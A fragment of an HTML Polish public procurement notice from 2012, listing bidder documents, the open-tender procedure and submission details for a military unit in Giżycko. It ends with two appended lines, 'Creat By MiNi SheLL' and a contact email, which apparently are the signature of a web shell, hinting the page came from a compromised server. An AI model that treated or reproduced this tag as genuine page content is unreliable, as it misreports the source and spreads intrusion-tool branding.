<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.24wog.wp.mil.pl, www.army.mil.pl, www.bip.mon.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nowowiejska 20, 11 -500 Giżycko, kancelaria nr 6 budynek nr5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 10:00, miejsce: Nowowiejska 20, 11 -500 Giżycko, w Kancelarii Jawnej pok (nr 109).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com